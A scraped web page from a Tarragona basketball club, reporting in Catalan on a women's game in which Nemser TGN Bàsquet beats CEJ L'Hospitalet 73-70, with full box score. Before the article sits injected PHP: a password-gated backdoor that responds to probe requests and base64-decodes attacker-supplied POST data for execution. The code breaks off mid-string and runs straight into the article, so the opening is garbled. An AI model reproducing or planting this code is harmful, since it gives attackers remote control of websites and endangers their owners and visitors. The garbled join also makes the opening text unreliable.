function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser, en un estat de maduresa brutal, derrota el totpoderós CEJ L'Hospitalet (73-70) - Tgn Bàsquet Club -

El Nemser, en un estat de maduresa brutal, derrota el totpoderós CEJ L’Hospitalet (73-70)

By
Updated: febrer 28, 2015

En un dels millors partits que es recorden al pavelló del Sagrat Cor, el Nemser TGN Bàsquet va donar un cop de puny damunt de la taula. De sublim es pot qualificar el joc del conjunt que entrena Jordi Hernández contra un rival, el CEJ l’Hospitalet que, abans d’arribar a Tarragona, només havia perdut un partit en tota la lliga. L’equip lila va consagrar-se com un bloc molt a tenir en compte d’aquí fins a final de lliga, especialment a casa, on ha demostrat una solidesa esfereïdora. Contra el líder, el Nemser TGN Bàsquet va sumar quelcom més important que la quarta victòria seguida, sinó que va aconseguir la maduresa que necessitava com a equip.

El partit de les noies d’Hernández va ser per emmarcar. Totes van aportar un sacrifici i una disciplina tàctica dignes d’admiració que van tenir en el tercer quart el seu punt culminant amb minuts de gran qualitat. Seria molt injust, molt, oblidar alguna de les jugadores a l’hora d’explicar el seu paper en el partit, però encara ho seria més no destacar alguns noms propis. El primer, Anna Garcia. Exercint de cervell a la pista, va controlar el joc com va voler i, després del descans, va fer un recital de fonaments, decisió i tècnica individual per catapultar el seu equip cap endavant. En el joc exterior, però, també va brillar Laura Vilamajor. L’esquerrana viu una temporada esplèndida i durant el partit va fer de tot. En ella recau el pes del joc de perímetre del Nemser TGN Bàsquet i, amb els galons que això suposa, va assumir la responsabilitat amb encert (4 triples) i bones decisions. La principal beneficiada de la clarividència de Vilamajor va ser Ester Farré que està creixent a la competició a marxes forçades. Conscient de què hi havia en joc, va erigir-se en el referent de l’equip en tots els aspectes: va guanyar la posició al pal baix, va rebotejar, anotar, ficar taps i intimidar. Sense ella, l’Hospitalet, que compta amb jugadores grans (i totes amb grans fonaments), hagués guanyat de totes totes. Menció a banda, la recuperació del millor moment de Villegas i la feina fosca, ingrata, però fonamental de Martínez. La resta, a un nivell colossal contra un adversari immens que, tot i patir la segona derrota del curs, va vendre cara la seva pell. Amb 71-64 en contra i 32 segons per jugar-se, les visitants van fer un parcial de 0-6 en 24 segons que van ficar la por al cos de les tarragonines. Una falta antiesportiva de Farré -l’únic error en una tarda magnífica- amb 71-66 i 22 segons per jugar, va possibilitar dos tirs lliures (un anotat) i un triple posterior. Amb tot, Vilamajor, des de la línia de personal, va sentenciar, rubricant una actuació per recordar.

El matx va ser digne de veure, independentment dels colors que defensés cadascú. L’Hospitalet va demostrar perquè només havia perdut un sol partit en tot el curs: format per jugadores amb força envergadura però, sobretot, ben treballades, on tothom aporta i sap què ha de fer i quan ho ha de fer, l’equip del Barcelonès va mantenir la iniciativa fins al descans, tot i que amb avantatges mínims (36-38). La sortida del Nemser TGN Bàsquet en el tercer quart va començar a decantar la balança en favor de l’equip lila. El repertori de Garcia va permetre marcar un parcial de 7-0 en tres minuts (45-38) que van capgirar el resultat. Amb la confiança que dóna el marcador a favor, el Nemser TGN Bàsquet va jugar amb molta intel·ligència i equilibri. Pilotes al pal baix a Ester Farré i a partir d’allí buscar la superioritat via passada interior o pilota a les exteriors per penetrar o bé tirar. Sense perdre massa pilotes, i amb una coordinació que evidencia un treball profund, les locals van arribar a l’últim quart amb 7 punts de renda (61-54, a 8′ del final). L’Hospitalet no va llençar mai la tovallola perquè la qualitat de les seves jugadores li ho impedeix, però la fermesa lila es va imposar en un matx que va ser una delícia pels aficionats.

 

NEMSER TGN BÀSQUET     73

CEJ L’HOSPITALET     70

NEMSER TGN BÀSQUET: G. Fort (3), O. Fort (7), Vilamajor (18), Martínez (5), Farré (16) -cinc inicial- Piñol, Garcia (15), Cabré, Villegas (9), Martí  i Gómez. 6/19 triples: Vilamajor (4), G. Fort i Villegas. 17/23 tirs lliures. 76 de valoració (Farré, 27).

CEJ L’HOSPITALET: Codina (8), Baslone (9), Gironella (4), Moreno (6), Dutren (17) -cinc inicial- Portillo (2), Alonso (2), De Sola (17), Pérez , Bargallo (10), Sánchez (4). 5 triples: Codina i De Sola (2), i Baslone. 21/27 tirs lliures. 20 faltes.

PARCIALS: 19-22, 17-16, 21-14 i 16-18.

ÀRBITRES: Ponce i Maza.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *